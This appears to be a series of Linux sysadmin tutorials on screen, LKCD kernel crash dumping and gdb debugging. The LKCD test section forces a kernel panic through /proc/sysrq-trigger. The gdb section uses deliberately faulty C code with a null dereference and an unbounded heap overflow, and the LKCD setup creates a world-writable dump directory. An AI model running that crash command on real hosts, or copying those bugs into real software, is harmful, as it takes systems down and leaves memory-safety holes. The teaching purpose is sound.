Time to learn about yet another cool little admin application that will change the way you think and work. We had strace, a mighty, versatile debugging tool that helped us diagnose and categorize system programs quickly and effectively and point us in the right direction in our investigation of problems. We had OProfile, a powerful profiling utility that can be used to time the system and application performance and identify chokepoints and bottlenecks in program executions. Time to step back and appraise screen.



screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells. Each virtual terminal provides the functions of the legendary DEC VT100 terminal.

Additionally, the utility has insert/delete line, support for multiple character sets, a scrollback history buffer for each virtual terminal, and a copy-and-paste mechanism that allows moving text regions between windows.

When screen is called, it creates a single window with a shell in it and then gets out of your way so that you can use the program as you normally would. Then, at any time, you can create new full-screen windows with other programs in them, including more shells, kill existing windows, view a list of windows, turn output logging on and off, copy & paste text between windows, view the scrollback history, switch between windows in whatever manner you wish, etc.

All windows run their programs completely independent of each other. Programs continue to run when their window is currently invisible and even when the whole screen session is detached from the user’s terminal. When a program terminates, screen kills the window that contained it. If this window was in the foreground, the display switches to the previous window; if none are left, screen exits.

In a nutshell, if the Alt + F keys allow you to switch between up to seven virtual consoles, horizontally, screen lets you create an infinite vertical stack of consoles in each one of these.

Home users running full GUI desktops and playing with tabbed terminal utilities would be hard-pressed to find merit in screen, but when you’re running in runlevel 3 and the monitor space is limited, screen is a blessing.

Screen in action

Let’s begin with a few screenshots. To start screen, just type screen in any console window, be it gnome-terminal, xterm, Konsole, or any other.


This will display an introduction message. Press Enter to dismiss it.


You’re inside a new virtual console. Why not fire another?


And here’s the second:


Using the right keyboard shortcuts, we can switch between them, back and forth. Use Ctrl + a then 0 to go to the zeroth (first) screen, Ctrl + a then 1 to go to the second one, and so forth.

First toggled

Now, demonstrating screen with still images is difficult, so here’s a Flash movie! Created using Wink, which served us well so many times, including the tutorial itself, as well as the Windows PowerShell article, and a few others.

So here we go:

Lovely, right! Damn right!

Help window

Don’t hesitate to call for help. Ctrl + a, then ? will pop the help screen.


Of course, you can also read the man page for more details. There’s plenty you can do with screen: attach/detach/reattach sessions, specify the history scrollback buffer, turn login mode on and off, suppress error messages, and more. screen is a powerful marvel and you should start using it.
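
A few of the most common session-management commands, as a quick sketch; the session name work is just an example:

```shell
screen -S work          # start a new session named "work"
# inside the session, Ctrl + a then d detaches it
screen -ls              # list running sessions
screen -r work          # reattach the detached session
screen -X -S work quit  # kill the session outright
```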


Yet another powerful tool mastered. Our list grows bigger, and so does our knowledge. screen may seem trivial to you, but what if you need to debug problems across multiple sessions and you can’t afford to have tons of Konsole or xterm windows strewn about the desktop like mad? Then, there’s the issue of practical visibility: never take your eyes off the screen and yet enjoy a full multi-view console.

I hope you liked this little surprise. Now, off to new wonders. Stay tuned for many more articles of great admin tools, aptly called super-duper, by me. Be excellent to each other and party on.

Collecting And Analyzing Linux Kernel Crashes – LKCD

Table of Contents

  1. LKCD – Introduction
    1. How does LKCD work?
  2. LKCD Installation
  3. Basic prerequisites
    1. A Linux operating system configured to use LKCD:
    2. LKCD configuration
  4. LKCD local dump procedure
    1. Required packages
    2. Configuration file
    3. Activate dump process (DUMP_ACTIVE)
    4. Configure the dump device (DUMP_DEVICE)
    5. Configure the dump directory (DUMPDIR)
    6. Configure the dump level (DUMP_LEVEL)
    7. Configure the dump flags (DUMP_FLAGS)
    8. Configure the dump compression level (DUMP_COMPRESS)
    9. Additional settings
    10. Enable core dump capturing
    11. Configure LKCD dump utility to run on startup
  5. LKCD netdump procedure
  6. Configure LKCD netdump server
    1. Required packages
    2. Configuration file
    3. Configure the dump flags (DUMP_FLAGS)
    4. Configure the source port (SOURCE_PORT)
    5. Make sure dump directory is writable for the netdump user
    6. Configure LKCD netdump server to run on startup
    7. Start the server
  7. Configure LKCD client for netdump
    1. Configure the dump device (DUMP_DEV)
    2. Configure the target host IP address (TARGET_HOST)
    3. Configure target host MAC address (ETH_ADDRESS)
    4. Configure target host port (TARGET_PORT)
    5. Configure the source port (SOURCE_PORT)
    6. Enable core dump capturing
    7. Configure LKCD dump utility to run on startup
    8. Start the lkcd-netdump utility
  8. Test functionality
    1. Example of unsuccessful netdump to different network segment
  9. Conclusion
  10. Download

LKCD – Introduction

LKCD stands for Linux Kernel Crash Dump. This tool allows the Linux system to write the contents of its memory when a crash occurs, so that they can be later analyzed for the root cause of the crash.

Ideally, kernels never crash. In reality, the crashes sometimes occur, for whatever reason. It is in the best interest of people using the plagued machines to be able to recover from the problem as quickly as possible while collecting as much data as possible. The most relevant piece of information for system administrators is the memory dump, taken at the moment of the kernel crash.

How does LKCD work?

You won’t notice LKCD in your daily work. Only when a kernel crash occurs will LKCD kick into action. The kernel crash may result from a kernel panic or an oops or it may be user-triggered. Whatever the case, this is when LKCD begins working, provided it has been configured correctly.

LKCD works in two stages:

Stage 1

This is the stage when the kernel crashes. Or more correctly, a crash is requested, either due to a panic, an oops or a user-triggered dump. When this happens, LKCD kicks into action, provided it has been enabled during the boot sequence.

LKCD copies the contents of the memory to a temporary storage device, called the dump device, which is usually a swap partition, but it may also be a dedicated crash dump collection partition.

After this stage is completed, the system is rebooted.

Stage 2

Once the system boots back online, LKCD is initiated. On different systems, this happens via a different startup script. For instance, on a RedHat machine, LKCD is run by the /etc/rc.sysinit script.

Next, LKCD runs two commands. The first command is lkcd config, which we will review more intimately later. This command prepares the system for the next crash. The second command is lkcd save, which copies the crash dump data from its temporary storage on the dump device to the permanent storage directory, called the dump directory.

Along with the dump core, an analysis file and a map file are created and copied; we’ll talk about these separately when we review the crash analysis.

A completion of this two-stage cycle signifies a successful LKCD crash dump.

Here’s an illustration:


Some reservations:

LKCD is a somewhat old utility. It may not work well with newer kernels.

All right, now that we know what we’re talking about, let us setup and configure LKCD.

LKCD Installation

You will have to forgive me, but I will NOT demonstrate the LKCD installation. There are several reasons for this untactical evasion on my behalf. I do not expect you to forgive me, but I do hope you will listen to my points:

The LKCD installation requires kernel compilation. This is a lengthy and complex procedure that takes quite a bit of time. It is impossible to explain how LKCD can be installed without showing the entire kernel compilation in detail. For now, I will have to skip this step, but I promise you a tutorial on kernel compilation.

Furthermore, the official LKCD documentation does cover this step. In fact, the supplied IBM tutorial is rather good. However, like most advanced technical papers geared toward highly experienced system administrators, it lacks actual usage examples.

Therefore, I will assume you have a working system compiled with LKCD. So the big question is, what now? How do you use this thing?

This tutorial will try to answer the questions in a linear fashion, explaining how to configure LKCD for local and network dumping of the memory core.

Basic prerequisites

A Linux operating system configured to use LKCD:

Most home users will probably not be able to meet this demand. On the other hand, when you think about it, the collection and analysis of kernel crashes is something you will rarely do at home. For home users, kernel crashes, if they ever occur within the limited scope of desktop usage, are just an occasional nuisance, the open-source world equivalent of the BSOD.

However, if you’re running a business, having your mission-critical systems go down can have a negative business impact. This means that you should be running the “right” kind of operating system in your work environment, configured to suit your needs.

LKCD configuration

LKCD dumps the system memory to a device. This device can be a local partition or a network server. We will discuss both options.

LKCD local dump procedure

Required packages

The host must have the lkcdutils package installed.

Configuration file

The LKCD configuration is located under /etc/sysconfig/dump. Back this up before making any changes! We will have to make several adjustments to this file before we can use LKCD. So let us begin.

Activate dump process (DUMP_ACTIVE)

To be able to use LKCD when crashes occur, you must activate it.


Configure the dump device (DUMP_DEVICE)

You should be very careful when configuring this directive. If you choose the wrong device, its contents will be overwritten when a crash is saved to it, causing data loss.

Therefore, you must make sure that the DUMPDEV is linked to the correct dump device. In most cases, this will be a swap partition, although you can use any block device whose contents you can afford to overwrite. Incidentally, this section partially explains the somewhat nebulous and historic requirement for a swap partition to be 1.5x the size of RAM.

What you need to do is define a DUMPDEV device and then link it to a physical block device; for example, /dev/sdb1. Let’s use the LKCD default, which calls for the DUMPDEV directive to be set to /dev/vmdump.


Now, please check that /dev/vmdump points to the right physical device. Example:

ls -l /dev/vmdump
lrwxrwxrwx 1 root root 5 Nov 6 21:53 /dev/vmdump -> /dev/sda5

/dev/sda5 should be your swap partition or a disposable crash partition. If the symbolic link does not exist, LKCD will create one the first time it is run and will link /dev/vmdump to the first swap partition found in the /etc/fstab configuration file. Therefore, if you do not want to use the first swap partition, you will have to manually create a symbolic link for the device configured under the DUMPDEV directive.
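
The check-and-relink logic can be rehearsed in a throwaway directory first, so no real devices are touched; the sdb2 name here is purely hypothetical:

```shell
# sketch: verify where a vmdump-style symlink points and relink it if needed,
# exercised in a temp dir rather than against real devices
tmp=$(mktemp -d)
touch "$tmp/sdb2"                 # stand-in for the desired swap/crash partition
ln -s "$tmp/sdb2" "$tmp/vmdump"   # what 'ln -s /dev/sdb2 /dev/vmdump' would do
target=$(readlink "$tmp/vmdump")  # same check as 'ls -l /dev/vmdump'
echo "vmdump -> $target"
rm -rf "$tmp"
```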

Configure the dump directory (DUMPDIR)

This is where the memory images saved previously to the dump device will be copied and kept for later analysis. You should make sure the directory resides on a partition with enough free space to contain the memory image, especially if you’re saving all of it. This means 2GB RAM = 2GB space or more.

In our example, we will use /tmp/dump. The default is set to /var/log/dump.
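
A quick sanity check that the dump directory’s filesystem can actually hold a full memory image might look like this. It is a sketch: /tmp stands in for the dump directory, and the comparison is deliberately crude.

```shell
# sketch: compare total RAM against free space on the dump directory's filesystem
dumpdir=/tmp
ram_kb=$(awk '/^MemTotal:/ {print $2}' /proc/meminfo)
free_kb=$(df -Pk "$dumpdir" | awk 'NR==2 {print $4}')
echo "RAM: ${ram_kb} kB, free on ${dumpdir}: ${free_kb} kB"
if [ "$free_kb" -lt "$ram_kb" ]; then
    echo "warning: not enough space for a full dump"
fi
```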


And a screenshot of the configuration file in action, just to make you feel comfortable:


Configure the dump level (DUMP_LEVEL)

This directive defines what part of the memory you wish to save. Bear in mind your space restrictions. However, the more you save, the better when it comes to analyzing the crash root cause.

  • Do nothing, just return if called
  • Dump the dump header and first 128K bytes
  • Everything in DUMP_HEADER and kernel pages only
  • Everything except kernel free pages
  • All memory

Configure the dump flags (DUMP_FLAGS)

The flags define what type of dump is going to be saved. For now, you need to know that there are two basic dump device types: local and network.

  • Local block device
  • Network device

Later, we will also use the network option. For now, we need local.


Configure the dump compression level (DUMP_COMPRESS)

You can keep the dumps uncompressed or use RLE or GZIP to compress them. It’s up to you.


I would call the settings above the “must-have” set. You must make sure these directives are configured properly for the LKCD to function. Pay attention to the devices you intend to use for saving the crash dumps.
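
Collected in one place, the must-have directives for a local dump could look like the fragment below. The numeric values for level, flags and compression are how I recall them from the LKCD documentation, so treat them as assumptions and double-check them against the comments in your own configuration file:

```shell
# /etc/sysconfig/dump - minimal local-dump sketch; verify values against your file
DUMP_ACTIVE="1"            # enable LKCD
DUMPDEV="/dev/vmdump"      # symlink to the swap/crash partition
DUMPDIR="/tmp/dump"        # where saved cores end up
DUMP_LEVEL="8"             # all memory (assumed value; see the level list above)
DUMP_FLAGS="0x80000000"    # local block device (assumed value)
DUMP_COMPRESS="2"          # GZIP (assumed value)
```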

Additional settings

There are several other directives listed in the configuration file. These are all set to the configuration defaults. You can find a brief explanation of each below. If you find the section inadequate, please email me and I’ll elaborate.

These include:

  • DUMP_SAVE="1" – Save the memory image to disk
  • PANIC_TIMEOUT="5" – The timeout (in seconds) before a reboot after a panic occurs
  • BOUNDS_LIMIT="10" – A limit on the number of dumps kept
  • KEXEC_IMAGE="/boot/vmlinuz" – Defines what kernel image to use after rebooting the system; usually, this will be the same kernel used in normal production
  • KEXEC_CMDLINE="root console=tty0" – Defines what parameters the kernel should use when booting after the crash; usually, you won’t have to tamper with this setting – but if you have problems, email me.

In general, we’re ready to use LKCD. So let’s do it.

Enable core dump capturing

The first step we need to do is enable the core dump capturing. In other words, we need to sort of source the configuration file so the LKCD utility can use the values set in it. This is done by running the lkcd config command, followed by the lkcd query command, which allows you to see the configuration settings.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_DISKDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

To work properly, LKCD must run on boot. On RedHat machines, you can use the chkconfig utility to achieve this:

chkconfig boot.lkcd on

After the reboot, your machine is ready for crashing … I mean crash dumping. We can begin testing the functionality. However …


Disk-based dumping may not always succeed in all panic situations. For instance, dumping on hung systems is a best-effort attempt. Furthermore, LKCD does not seem to like md RAID devices, which introduces another problem into the equation. To overcome the potentially troublesome situations where you may end up with failed crash collections to local disks, you may want to consider the network dumping option. Therefore, before we demonstrate the LKCD functionality, we’ll study the netdump option first.

LKCD netdump procedure

Netdump procedure is different from the local dump in having two machines involved in the process. One is the host itself that will suffer kernel crashes and whose memory image we want to collect and analyze. This is the client machine. The only difference from a host configured for local dump is that this machine will use another machine for storage of the crash dump.

The storage machine is the netdump server. Like any server, this host will run a service and listen on a port for incoming network traffic, particular to the LKCD netdump. When crashes are sent, they will be saved to the local block device on the server. Other terms used to describe the relationship between the netdump server and the client are source and target: the client is the source, the machine that generates the information; the server is the target, the destination where the information is sent.

We will begin with the server configuration.

Configure LKCD netdump server

Required packages

The server must have the following two packages installed: lkcdutils and lkcdutils-netdump-server.

Configuration file

The configuration file is the same one, located under /etc/sysconfig/dump. Again, back this file up before making any changes. Next, we will review the changes you need to make in the file for the netdump to work. Most of the directives will remain unchanged, so we’ll take a look only at those specific to netdump procedure, on the server side.

Configure the dump flags (DUMP_FLAGS)

This directive defines what kind of dump is going to be saved to the dump directory. Earlier, we used the local block device flag. Now, we need to change it. The appropriate flag for network dump is 0x40000000.


Configure the source port (SOURCE_PORT)

This is a new directive we have not seen or used before. This directive defines on which port the server should listen for incoming connections from hosts trying to send LKCD dumps. The default port is 6688. When configured, this directive effectively turns a host into a server – provided the relevant service is running, of course.
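
The two netdump-specific server directives then read as follows; the network-dump flag value and the port both come straight from the text above:

```shell
# /etc/sysconfig/dump on the netdump server - netdump-specific directives
DUMP_FLAGS="0x40000000"   # network dump
SOURCE_PORT="6688"        # port the server listens on
```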


Make sure dump directory is writable for the netdump user

This directive is extremely important. It defines the ability of the netdump service to write to the partitions / directories on the server. The netdump server runs as the netdump user. We need to make sure this user can write to the desired destination (dump) directory. In our case:

install -o netdump -g dump -m 777 -d /tmp/dump

You may also want to ls the destination directory and check the owner:group. It should be netdump:dump. Example:

ls -ld dump
drwxrwxrwx 3 netdump dump 96 2009-02-20 13:35 dump

You may also try getting away with manually chowning and chmoding the destination to see what happens.
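
The permission side of that install command can be rehearsed on a scratch directory first; on the real server the owner should of course be netdump:dump, while here we only verify the mode bits:

```shell
# sketch: create a dump directory and confirm its mode, as 'install -m 777 -d' would
tmp=$(mktemp -d)
install -m 777 -d "$tmp/dump"   # real server: install -o netdump -g dump -m 777 -d /tmp/dump
mode=$(stat -c %a "$tmp/dump")  # numeric permissions, e.g. 777
echo "dump dir mode: $mode"
rm -rf "$tmp"
```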

Configure LKCD netdump server to run on startup

We need to configure the netdump service to run on startup. Using chkconfig to demonstrate:

chkconfig netdump-server on

Start the server

Now, we need to start the server and check that it’s running properly. This includes both checking the status and the network connections to see that the server is indeed listening on port 6688.

/etc/init.d/netdump-server start
/etc/init.d/netdump-server status


netstat -tulpen | grep 6688
udp 0 0* 479 37910 >>
>> 22791/netdump-server

Everything seems to be in order. This concludes the server-side configurations.

Configure LKCD client for netdump

The client is the machine (which can also be a server of some kind) that we want to collect kernel crashes for. When the kernel crashes on this machine, for whatever reason, we want it to send its core to the netdump server. Again, we need to edit the /etc/sysconfig/dump configuration file. Once again, most of the directives are identical to the previous configurations.

In fact, by changing just a few directives, a host configured to save local dumps can be converted for netdump.

Configure the dump device (DUMP_DEV)

Earlier, we configured our clients to dump their core to the /dev/vmdump device. However, network dump requires an active network interface. There are other considerations as well, but we will review them later.


Configure the target host IP address (TARGET_HOST)

The target host is the netdump server, as mentioned before. In our case, it’s the server machine we configured above. To configure this directive – and the one after – we need to go back to our server and collect some information, the output from the ifconfig command, listing the IP address and the MAC address. For example:

inet addr:
HWaddr 00:12:1b:40:c7:63

Therefore, our target host directive is set to:


Alternatively, it is also possible to use hostnames, but this requires a hosts file, DNS, NIS or another name resolution mechanism properly set up and working.

Configure target host MAC address (ETH_ADDRESS)

If this directive is not set, the LKCD will send a broadcast to the entire neighborhood, possibly inducing a traffic load. In our case, we need to set this directive to the MAC address of our server:



Please note that the netdump functionality is currently limited to the same subnet that the server runs on. In our case, this means a /24 subnet. We’ll see an example of this shortly.

Configure target host port (TARGET_PORT)

We need to set this option to what we configured earlier for our server. This means port 6688.


Configure the source port (SOURCE_PORT)

Lastly, we need to configure the port the client will use to send dumps over network. Again, the default is 6688.
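
Taken together, the client-side netdump directives might look like the fragment below. The interface value is an assumption, the IP address is a placeholder (the real one was elided from the ifconfig output above), and the MAC address is the server’s, as listed earlier:

```shell
# /etc/sysconfig/dump on the client - netdump sketch; values are examples
DUMP_DEV="eth0"                  # active network interface (assumed value)
TARGET_HOST="192.168.1.100"      # netdump server IP - placeholder, use your own
ETH_ADDRESS="00:12:1b:40:c7:63"  # server MAC, from the ifconfig output above
TARGET_PORT="6688"
SOURCE_PORT="6688"
```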


And image example:

Source port

This concludes the changes to the configuration file.

Enable core dump capturing

Perform the same steps we did during the local dump configuration: run the lkcd config and lkcd query commands and check the setup.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_NETDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

Once again, the usual procedure:

chkconfig lkcd-netdump on

Start the lkcd-netdump utility

Start the utility by running the /etc/init.d/lkcd-netdump script.

/etc/init.d/lkcd-netdump start

Watch the console for successful configuration message. Something like this:


This means you have successfully configured the client and can proceed to test the functionality.

Test functionality

To test the functionality, we will force a panic on our kernel. This is something you should be careful about doing, especially on your production systems. Make sure you backup all critical data before experimenting.

To be able to create a panic, you will have to enable the System Request (SysRq) functionality on the desired clients, if it has not already been set:

echo 1 > /proc/sys/kernel/sysrq

And then force the panic:

echo c > /proc/sysrq-trigger

Watch the console. The system should reboot after a while, indicating a successful recovery from the panic. Furthermore, you need to check the dump directory on the netdump server for the newly created core, indicating a successful network dump. Indeed, checking the destination directory, we can see the memory core was successfully saved. And now we can proceed to analyze it.


Example of unsuccessful netdump to different network segment

As mentioned before, the netdump functionality seems limited to the same subnet. Trying to send the dump to a machine on a different subnet results in an error (see screenshot below). I have tested this functionality for several different subnets, without success. If anyone has a solution, please email it to me.

Here’s a screenshot:



LKCD is a very useful application, although it has its limitations.

On one hand, it provides the critical ability to perform in-depth post-mortem forensics on crashed systems. The netdump functionality is particularly useful in allowing system administrators to save memory images after kernel crashes without relying on the internal hard disk space or the hard disk configuration. This can be particularly useful for machines with very large RAM, when dumping the entire contents of the memory to local partitions might be problematic. Furthermore, the netdump functionality allows LKCD to be used on hosts configured with RAID, overcoming the fact that LKCD is unable to work with md partitions.

However, the limitation to use within the same network segment severely limits the ability to mass-deploy the netdump in large environments. It would be extremely useful if a workaround or patch were available so that centralized netdump servers could be used without relying on specific network topology.

Lastly, LKCD is a somewhat old utility and might not work well with modern kernels. In general, it is fairly safe to say it has been replaced by the more flexible Kdump, which we will review in the next article.

Linux Super-Duper Admin Tools: GNU Debugger (gdb)

Let’s talk debug. So you wrote a piece of code and you want to compile it and run it. Or you have a binary and you just run it. The only problem is, the execution fails with a segmentation fault. For all practical purposes, you call it a day.

Luckily for you, the ultimate combination of the GNU Debugger (gdb) and Dedoimedo tutorials will help you overcome the problem. Today, we will learn how to handle misbehaving binary code, how to examine its execution step by step, how to interpret errors and problems, and we will even step into the assembly code and hunt for problems there. This won’t be easy, but it sure will be one of the best super-duper admin guides you have read so far.



I repeat: this will not be easy. Working with gdb is not something anyone can do at their leisure. There are many requirements you must meet before you can have a successful session.


You can debug code without having access to source files. However, your task will be more difficult, because you will not be able to refer to the actual code and try to understand if there’s any kind of logical fallacy in the execution. You will only be able to follow symptoms and try to figure out where things might be wrong, but not why.

Sources compiled with symbols

On top of that, you will want sources with symbols, so you can map instructions in the binary program to their corresponding functions and lines in the source code. Otherwise, you will be sort of groping in the dark.

Understanding of gdb

This tutorial will teach you a handful of basic and intermediate commands, so you need not worry too much about that. However, if you really find the concepts alien and you struggle with compilations and working on the command line in general, perhaps this topic is a little advanced for you at the moment.

Understanding of Linux system

This is probably the most important element. First, you will need some core knowledge of the memory management in Linux. Then, the fundamental concepts like code, data, heap, stack and whatnot. You should also be able to navigate /proc with some degree of comfort. You should also be familiar with the AT&T Assembly syntax, which is the syntax used in Linux, as opposed to Intel syntax, for example.

All right, if you meet all of the above – or wish to – then you can proceed.

Simple example

We will begin with a simple example – a null pointer. In layman’s terms, null pointer is a pointer to an address in the memory space that does not have a meaningful value and cannot be referenced by the calling program, for whatever reason. This will normally lead to an unhandled error, resulting in a segmentation fault.

Here’s our source code:

Source code

#include <stdio.h>

int main (int argc, char* argv[])
{
    int* boom = 0;
    printf("hello %d", *boom);
    return 0;
}

Now, let us compile it, with symbols. This is done by using the -g flag when running gcc. We have seen this before, in the Linux Kernel Crash Book examples.


gcc -g source.c -o naughty-file.bin

And then, we run it and get a nasty segmentation fault:


Now, you may want to try to debug this problem using standard tools, like perhaps strace, ltrace, maybe lsof, and a few others. Normally, you would do this, because having a methodical approach to problem solving is always good, and you should start with simple things first. However, I will purposefully not do that right now to keep the mind clobber at a minimum. As we advance in the tutorial, we will see more complex examples and the use of other tools, too.

All right, so now we need to start using the GNU Debugger. We will invoke the program once again, this time through gdb. The syntax is simple:

gdb <program>

And so we do it.

Invoked gdb

For the time being, nothing happens. The important thing is that gdb has read symbols from our binary. The next step is to run the program and reproduce the segmentation fault. To do this, simply use the run command inside gdb.


We see several important details. One, the separate debuginfo (symbols) for third-party libraries, which are not part of our own code, is missing. This means that we can hook into their execution, but we won’t see any symbols. We’ll see an example soon. Two, we see that our program crashes. The problem is in the sixth line of the source, as shown in the image, our printf line. Does this mean there’s a problem with printf? Probably not; more likely, something is wrong with the variable that printf is trying to use. The plot thickens.

What we learn here is that we have symbols, that gdb won’t run automatically and that we have a meaningful way of reproducing the problem. This is very important to remember, but we will recap this when we discuss when to run or not to run gdb.


Running through the program does not yield enough meaningful information. We need to halt the execution just before the printf line. Enter breakpoints, just like when working with any debugger. We will break into the main function and then advance step by step until the problem occurs again, then rerun and break, then execute commands one at a time just short of the segmentation fault.

To this end, we need the break command, which lets you specify breakpoints either against functions (your own, or third-party ones loaded by external libraries) or against specific lines of code in your sources; an example is on the way. Then, we will use the info command to examine our breakpoints.

We will place the break point in the main() function. As a rule of thumb, it’s always a good place to start.

break main

Break point

Now we run again. The execution halts when we reach main().

Run with break

Step by step, oooh babe

Now that we have stopped at the entry to main, we will step through the code line by line, using the next command. Luckily for us, there isn’t that much code to walk through. After just two steps, we segfault. Good.


We will now rerun the code, break in main(), do a single next that will lead us to printf, and then we will halt and examine the assembly code, no less!



Indeed, at this stage, there’s nothing else the code can tell us. We have exhausted our understanding of what happens at the source level. Seemingly, there is no great problem, or rather, we just can’t see it yet.

So we will use the disassemble command, which will dump the assembly code. In a way, it’s no different than what we did when using objdump against a binary in the kernel crash example. The big difference is, you have full control of your execution here, so you don’t need to understand everything; just limit your work to a small subset of code.

Just type disassemble inside gdb and this will dump the assembly instructions that your code uses. It will look like the screenshot below.


This is probably the most difficult part of the tutorial yet. Assembly code is not easy to digest and looks like Rain Man’s afternoon fun. Let’s try to understand what we see here, again in very simplistic terms.

On the left, we have memory addresses. The second column shows increments in the memory space from the starting address. The third column shows the mnemonic. The fourth column includes actual registers and values.

If you feel lost, consider reading the TL;DR section below, to get even more lost.

All right, there’s a little arrow pointing at the memory address where our execution is right now. We are at offset 40054b, and we have moved the value that is stored 8 bytes below the base pointer into the RAX register. One line before that, we moved the value 0 into the RBP-8 address. So now, we have the value 0 in the RAX register.

0x00000000400543 <+15> movq $0x0,-0x8(%rbp)
0x0000000040054b <+23> mov  -0x8(%rbp),%rax

Our next instruction is the one that will cause the segmentation fault, as we have seen earlier while next-ing through the code.

0x0000000040054f <+27> mov  (%rax),%edx

So we need to understand what’s wrong here. Let’s examine the EDX register, which is supposed to get this new value. We can do this by using the examine or x command, which displays the memory at a given address. You can use all kinds of output formats, but that’s not important right now.

x $edx

Register values

And we get a message that we cannot access memory at the specified address. This is the clue right there, problem solved. We tried fondling memory that is not to be fondled. As to why we breached our allocation and how we can know that, we will learn soon.

Not so simple example

Now, we do something more complex. We’ll create a dynamic array called pointer, which also happens to be a pointer, there’s a punny pun right there. We’ll use the standard malloc subroutine for this. We will then loop, incrementing i by 1 every iteration and writing into pointer[i], letting pointer exceed its allowed memory space, AKA a heap overflow. Understandable as a lab case, but let’s see this happen in real life and how we can handle problems like these. Most importantly, we will learn additional gdb commands.

Here’s the source:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    int *pointer;
    int i;

    pointer = malloc(sizeof(int));
    for (i = 0; 1; i++) {
        pointer[i] = i;
        printf("pointer[%d] = %d\n", i, pointer[i]);
    }
    return 0;
}

Let’s compile:

gcc -g seg.c -o seg

When we run it, we see something like this:


pointer[33785] = 33785
pointer[33786] = 33786
pointer[33787] = 33787
Segmentation fault

Now, before we hit gdb and assembly, let’s try some normal debugging. Let’s say you want to try to solve the problem with one of the standard system admin and troubleshooting tools, like strace. After having heard of strace on Dedoimedo, you know the tool’s worth, and you want to attempt the simple steps first. Indeed, strace works well in most cases. But here, it’s of no use.

15715 write(1, "pointer[33784] = 33784\n", 23) = 23
15715 write(1, "pointer[33785] = 33785\n", 23) = 23
15715 write(1, "pointer[33786] = 33786\n", 23) = 23
15715 write(1, "pointer[33787] = 33787\n", 23) = 23
15715 --- SIGSEGV (Segmentation fault) @ 0 (0) ---
15715 +++ killed by SIGSEGV +++

Nothing useful there really. In fact, no classic tool will give you any indication what happens here. So we need a debugger, gdb in our case. Load the program.

gdb /tmp/seg


Like before, we set a breakpoint. However, using main() is not going to be good for us, because the program will enter main() once and then loop, never going back to the set breakpoint. So we need something else. We need to break in a specific line of code.

To determine the best place, we could run and try to figure out where the problem occurs. We can also take a look at our code and make an educated guess. This should be somewhere in the for loop of course. So perhaps, the start of it?

Break line



All right, but this is not good enough. We will have a breakpoint at every entry to our loop, and from the execution run, we see there are going to be some 30K+ iterations. We cannot possibly manually type cont and hit Enter every time. So we need a condition, an if statement that will break only if a specific condition is met.

From our sample run, we see that the problem occurs when i reaches the value of 33787, so we’ll place a conditional break one or two loop iterations before that. Conditions are set per breakpoint. Notice the breakpoint number after it is set, because we need that number to set a condition.

break 10
Breakpoint 1 at …

And then:

condition 1 i == 33786


If you had multiple breakpoints and you wanted to set multiple conditions, then you would invoke the correct breakpoint number. All right, we’re ready to roll, hit run and let the for loop churn for a while.

Condition reached

All right, now we walk through the code, step by step using the next command.


All right, we know the problem occurs after pointer[i]=i is set, when the i value is 33787. Which means, we will rerun the program and then stop just short of executing the pointer[i]=i line of code after a successful print of pointer[33787] = 33787.

Now, the next time we reach this point, we create the assembly dump.


We know the problem occurs at offset 4005bc, where we mov %eax value into %rdx. This is similar to what we saw earlier. But we need to understand what happens before that, one or two instructions back.

Stepping through assembly dump

To this end, we will use the stepi command, which walks the assembly dump one machine instruction at a time. It’s like next in a way, only at the level of individual instructions and registers, so to speak.

Take a look at the dump. The last line in the dump is the jump (jmp) instruction back to offset <main+29>, which brings us to mov 0xfffffffffffffffc(%rbp), %eax. This is effectively our for loop. Now, when we hit stepi, we will execute line 4005ac. I omitted the line that reads cltq, because it merely sign-extends the 4-byte EAX into the 8-byte RAX; that’s because we’re on a 64-bit system.


Now, we have several lines where the i value is incremented and whatnot. But the crucial line is just one short of the segmentation fault. We need to understand what’s inside those registers or if we can access them at all.

RDX register

And it turns out we can’t, just like earlier. But why? How can we know that this address is off limits?

proc mappings

In Linux, you can view the memory maps of any process through /proc/<pid>/maps. It is important to understand what a sample output provides before we can proceed. I’m not going to elaborate too much, but basically:

/proc maps

The first line is the code (or text) segment, the actual binary instructions. The second line shows data, which stores all initialized global variables. The third section is the heap, which is used for dynamic allocations, like malloc. Sometimes, it also includes the .bss segment, which stores uninitialized global and static variables. When the .bss segment is small, it can reside inside the data segment.

After that, you get shared libraries, and the first one is the dynamic linker itself. Finally, you get the stack. The two last lines are the Linux gating mechanisms for fast system calls, which replace the int 0x80 system call that was used in olden days. As you may notice, there are still more memory addresses above the last line, reserved by the kernel.

So here, at a glance, you can examine how your process resides in the memory. When a program is executed through gdb, you can view its memory allocations using the info proc mappings command.

info proc mappings


Three lines, code, data, heap. And for heap, we can see that the end address is 0x522000. And we can’t be using that, so we get our lovely segmentation fault. Back to C code, we will need to figure out what we did wrong, whether we molested our integer, tried an illegal allocation or double freeing or whatever.

Now, if you really wanna go Rain Man on this, you can start counting bytes. In general, we use a single page for code, because our executable is small. We use a single page for data. And then, there’s some heap space, a total of 0x21000, which is 132KB or more specifically 135168 bytes.

On the other hand, we ran through 33788 iterations of the for loop, each writing 4 bytes, the size of an int. Not 33787 as you may assume from the print output in our program run, but one more, because we started counting i at value 0.

So we get 135152 bytes, which is 16 bytes less than our heap. So you may ask, where did the extra 16 bytes go? Well, we can use the examine command again and check more accurately what happens at the start address.


We print eight 4-byte hexadecimal values. The first 16 bytes are the heap header and the count starts at address 0x501010. So we’re all good here, and we know why we got our nasty segmentation fault. We can examine our source code and try to figure out what we did wrong. Two examples, two problems solved.

Now, we will talk some more about using gdb in general, including collecting application cores and analyzing them, attaching to running processes, more tips on popular gdb commands, and we’ll see yet another example, which shows when gdb is not really useful and yet the assembly dump will tell us all we need, even if we do not have sources.

General advice & more stuff

Analyzing application cores

Similar to kernel crashes, application crashes can create cores that you can analyze later on. There are a few things that you need to make sure are properly set in the system before you can analyze cores.

Enable application cores

